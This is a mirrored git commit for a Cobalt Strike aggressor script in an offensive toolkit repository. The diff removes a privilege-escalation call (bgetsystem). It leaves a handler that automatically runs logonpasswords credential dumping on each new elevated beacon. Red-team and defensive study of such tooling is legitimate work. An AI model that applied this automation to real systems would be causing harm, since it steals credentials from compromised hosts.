mirror of
https://github.com/killswitch-GUI/CobaltStrike-ToolKit
synced 2026-06-08 15:16:14 +00:00
Update Initial-LAdminCheck.cna
This commit is contained in:
committed by
GitHub
parent
5111a92dc6
commit
30d64ffe62
@@ -23,7 +23,6 @@ on beacon_initial {
|
||||
$b = "*";
|
||||
if ($b isin $a)
|
||||
{
|
||||
bgetsystem($1);
|
||||
blogonpasswords($1);
|
||||
beacon_note($1, "Elevated Context: Ran LogonPasswords");
|
||||
}
|
||||
@@ -51,4 +50,4 @@ on beacon_output {
|
||||
# All intial beacons run script
|
||||
# event triggers on output
|
||||
# if it matches known string it executes logic
|
||||
# if intial matches a * in name it executes logic
|
||||
# if intial matches a * in name it executes logic
|
||||
|
||||
Reference in New Issue
Block a user